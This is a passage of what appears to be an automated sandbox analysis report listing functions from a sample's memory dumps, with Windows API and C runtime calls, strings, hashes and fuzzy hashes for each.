                                                                                                                                                                  • Opcode ID: 59564109ce6721ca6981465f57a59677c23f90e9ae6a1f8900d6c00c07e4e911
                                                                                                                                                                  • Instruction ID: df6193bed593758df005c03afe2e874a06b6c1738a9731931e3d57f68dc5dbb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 59564109ce6721ca6981465f57a59677c23f90e9ae6a1f8900d6c00c07e4e911
                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0283D9403087EDB14BA95CC03FBA77AC9F12784F148019F845A6282C7B99805C3A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001A1260
                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001A1296
                                                                                                                                                                    • Part of subcall function 001AF100: _Yarn.LIBCPMT ref: 001AF11F
                                                                                                                                                                    • Part of subcall function 001AF100: _Yarn.LIBCPMT ref: 001AF143
                                                                                                                                                                  • std::exception::exception.LIBCONCRT ref: 001A12AF
                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 001A12C4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::exception::exception
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 159601860-1405518554
                                                                                                                                                                  • Opcode ID: c96ba02b2a1c04063ca5c3ba76b127fa96f9fb34623b85ada55dc373afceacee
                                                                                                                                                                  • Instruction ID: 91b8b9fae90eedc6fb91db4b137552529f25807321ee44045def24db17a9d415
                                                                                                                                                                  • Opcode Fuzzy Hash: c96ba02b2a1c04063ca5c3ba76b127fa96f9fb34623b85ada55dc373afceacee
                                                                                                                                                                  • Instruction Fuzzy Hash: 89014475905744AEC720DFAAD481486FBE8BE293107908A6FE48AD3A11D770E504CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,001C986E,000000FF,?,001B8108,?,?,001B80DC,00000016), ref: 001B81A3
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B81B5
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,001C986E,000000FF,?,001B8108,?,?,001B80DC,00000016), ref: 001B81D7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                  • Opcode ID: f008c65ba967b8db13e903ada15e02b98b9d3a5c2ddb15a95089d2be3ac9fd0c
                                                                                                                                                                  • Instruction ID: e532f5418c696d94a282f301ee237c8bca330c09eb0827b9409a5d98d0de35ba
                                                                                                                                                                  • Opcode Fuzzy Hash: f008c65ba967b8db13e903ada15e02b98b9d3a5c2ddb15a95089d2be3ac9fd0c
                                                                                                                                                                  • Instruction Fuzzy Hash: 23014B32904669AFDB129F54DC09FAEBBF8FB04B58F000629F811A26A0DB75D950CA91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 001BEC39
                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 001BED02
                                                                                                                                                                  • __freea.LIBCMT ref: 001BED69
                                                                                                                                                                    • Part of subcall function 001B7330: HeapAlloc.KERNEL32(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362
                                                                                                                                                                  • __freea.LIBCMT ref: 001BED7C
                                                                                                                                                                  • __freea.LIBCMT ref: 001BED89
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1096550386-0
                                                                                                                                                                  • Opcode ID: 073fcef5bfe98504a3dd8036e1c9ae17d32d90d86b38c20ca1c213ae1a41f577
                                                                                                                                                                  • Instruction ID: f9d85bfb9e06646ccfdcd3b39a780c9f3da7ec042ab7628b65f47fb4ecf41c2e
                                                                                                                                                                  • Opcode Fuzzy Hash: 073fcef5bfe98504a3dd8036e1c9ae17d32d90d86b38c20ca1c213ae1a41f577
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D51E172600246AFEB249FE0CC81EFB3AEAEF95720F15052CFC08D6150EBB0DC5196A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016302E7
                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 0163031E
                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016302BD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                  • Opcode ID: c5abbff752279591b56195804e311db70439a04a3724b4a6632c4bc19fa25c78
                                                                                                                                                                  • Instruction ID: a1b1c7946e7983272bec8b1374db2370507b229eaf29a4a7849c087531a67eed
                                                                                                                                                                  • Opcode Fuzzy Hash: c5abbff752279591b56195804e311db70439a04a3724b4a6632c4bc19fa25c78
                                                                                                                                                                  • Instruction Fuzzy Hash: E2E18071A087429FE729CF28C888B2ABBE1BF84314F144A5EF5958B3D1DB74D945CB42
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001AE4D9: __EH_prolog.LIBCMT ref: 001AE4DE
                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1E44
                                                                                                                                                                    • Part of subcall function 001ACBFB: _memcmp.LIBVCRUNTIME ref: 001ACC63
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: H_prologIos_base_dtor_memcmpstd::ios_base::_
                                                                                                                                                                  • String ID: </v>$<c r=$<v>
                                                                                                                                                                  • API String ID: 2171099386-3488173955
                                                                                                                                                                  • Opcode ID: fc0929b5457149f033e50979723a348fcf93da067736708e6f81fa38d66970d2
                                                                                                                                                                  • Instruction ID: 60ee7695180e59a9f5a63f25d3c4f94eb36793fd85ad22e897a6369376d493dd
                                                                                                                                                                  • Opcode Fuzzy Hash: fc0929b5457149f033e50979723a348fcf93da067736708e6f81fa38d66970d2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7751D3761083406ED314EB24DC86EAFBBE8EFD6354F004A2DF59697291DB709909C7A2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01637B7F
                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 01637BAC
                                                                                                                                                                  • RTL: Resource at %p, xrefs: 01637B8E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                  • Opcode ID: 45f0aab5379ae31daaf8c51de0752931378a958e0a51c8197d31b4d6b9768e67
                                                                                                                                                                  • Instruction ID: 8820db57b202f1d5aa07c59526e4d2bad900691086d03a2124e3b55c028db8bd
                                                                                                                                                                  • Opcode Fuzzy Hash: 45f0aab5379ae31daaf8c51de0752931378a958e0a51c8197d31b4d6b9768e67
                                                                                                                                                                  • Instruction Fuzzy Hash: 1341D0357047029FD725DE29CC40B6BB7E6FF98720F100A1DEA6A9B780DB31E9058B95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0163728C
                                                                                                                                                                  Strings
                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01637294
                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 016372C1
                                                                                                                                                                  • RTL: Resource at %p, xrefs: 016372A3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                  • Opcode ID: 12a0ba85ced21821e2de1cf87735dfeb89c956140c8c1b86ee04f0846aa7e058
                                                                                                                                                                  • Instruction ID: 0345742ea9ea08acfafb05acde0bb94d2dfedf12881fd780cfd2538ab65447f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 12a0ba85ced21821e2de1cf87735dfeb89c956140c8c1b86ee04f0846aa7e058
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C410071700206ABD721CE29CC41F6AB7A6FF94710F104A1DFE55AB380DB21F8428BD5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                  • Opcode ID: b47620dc5f99a0d2851d0fcabb5e82a227a420e5616d62ba18962681ba9205c8
                                                                                                                                                                  • Instruction ID: db2073592791268685191b43c09918175eff041cef0db78b2b446e59ef490752
                                                                                                                                                                  • Opcode Fuzzy Hash: b47620dc5f99a0d2851d0fcabb5e82a227a420e5616d62ba18962681ba9205c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C316172A006199FDB20DF2DDC50BEFB7F9FB54610F44455EE949E3240EB30AA558BA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 001BB9DB
                                                                                                                                                                    • Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001BBC2D
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001BBC73
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001BBD16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                  • Opcode ID: 30bafd1970cd88088d3fd4c9f94577787e8c4020ea79ad0efee4d28d9327d0ef
                                                                                                                                                                  • Instruction ID: e80f502c74f0e1009ec33310733f237df15c13417417044f101471337e295d32
                                                                                                                                                                  • Opcode Fuzzy Hash: 30bafd1970cd88088d3fd4c9f94577787e8c4020ea79ad0efee4d28d9327d0ef
                                                                                                                                                                  • Instruction Fuzzy Hash: A1D188B5D082489FCF15CFA8C8D0AEDBBB5FF09304F28452AE856EB651D770A942CB50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001C14C6
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C14CD
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 001C1507
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C150E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1913693674-0
                                                                                                                                                                  • Opcode ID: 713b5a02dcef0686d2119146bd21ad3c03df7be2a3e72a25da7cd182d078c62d
                                                                                                                                                                  • Instruction ID: 5879813038cc4f2048a93541e567ad74cee9b4672f6f6bc840ab0e42b4f351fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 713b5a02dcef0686d2119146bd21ad3c03df7be2a3e72a25da7cd182d078c62d
                                                                                                                                                                  • Instruction Fuzzy Hash: D621C572640205BF9F24AF66CC81EABB7A9FF763A8711851CF91A97142D730EC40CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d99817f9fa433bd5c7fc1e895bfdc3525a43e2deef1b28e3501ad438f4c4fbce
                                                                                                                                                                  • Instruction ID: c856b30029250c9a7dd7fa0c99d4f903c69e576394fe64e042bb281813c6158d
                                                                                                                                                                  • Opcode Fuzzy Hash: d99817f9fa433bd5c7fc1e895bfdc3525a43e2deef1b28e3501ad438f4c4fbce
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C21F631608205AFAB60AF76DC81DEFB7A9BFA13A87054914F919E75D1D730ED4087A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 001C240B
                                                                                                                                                                    • Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202
                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001C2443
                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001C2463
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 158306478-0
                                                                                                                                                                  • Opcode ID: 014788fd4f561f189c1fffba61706749fabb2be4dc235c8ea1802a15aedea0ed
                                                                                                                                                                  • Instruction ID: 3a3239c8a9f2ba4f11e1779af32997580afd65e1d2d599e5c131e8cc4b445be2
                                                                                                                                                                  • Opcode Fuzzy Hash: 014788fd4f561f189c1fffba61706749fabb2be4dc235c8ea1802a15aedea0ed
                                                                                                                                                                  • Instruction Fuzzy Hash: 8211D6B2A05219FF671A27719C8EEAF6D6CEEA93A83510028F501D1101FB74CD0181B1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 001B22D8
                                                                                                                                                                    • Part of subcall function 001B2910: ___AdjustPointer.LIBCMT ref: 001B295A
                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 001B22EF
                                                                                                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 001B2301
                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 001B2325
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2633735394-0
                                                                                                                                                                  • Opcode ID: 016e3b4a47e3c793a89763145e5dfa688c85616b6bcb55d92dd5a28a327169d4
                                                                                                                                                                  • Instruction ID: 579d02e0d58413cb68fcd450e2a6fa41b9a3ff32d82270c2bd18a260a69cea82
                                                                                                                                                                  • Opcode Fuzzy Hash: 016e3b4a47e3c793a89763145e5dfa688c85616b6bcb55d92dd5a28a327169d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 54010832000109FBCF126F55CC01EEA3BBAFF58754F158154FD18A6121D736E9A5EBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,001B6731,00000000,00000000,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000), ref: 001C82CA
                                                                                                                                                                  • GetLastError.KERNEL32(?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?,?,?,001BC344,00000000), ref: 001C82D6
                                                                                                                                                                    • Part of subcall function 001C829C: CloseHandle.KERNEL32(FFFFFFFE,001C82E6,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?,?), ref: 001C82AC
                                                                                                                                                                  • ___initconout.LIBCMT ref: 001C82E6
                                                                                                                                                                    • Part of subcall function 001C825E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001C828D,001C5792,?,?,001BBD6A,?,00000000,00000000,?), ref: 001C8271
                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,001B6731,00000000,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?), ref: 001C82FB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                  • Opcode ID: 3b1d4bc5219df6d872cf7512e75bf9178f882db4a2eab7bf29996077233b5407
                                                                                                                                                                  • Instruction ID: 85cf91a034373ea966cda54712f98a31f23d5994b53b64c93483f0c9adbc9941
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b1d4bc5219df6d872cf7512e75bf9178f882db4a2eab7bf29996077233b5407
                                                                                                                                                                  • Instruction Fuzzy Hash: 62F03036003169BFCF221F91DC48E8A3F66FF28BE1B404014FA098A530CB32C861DB92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
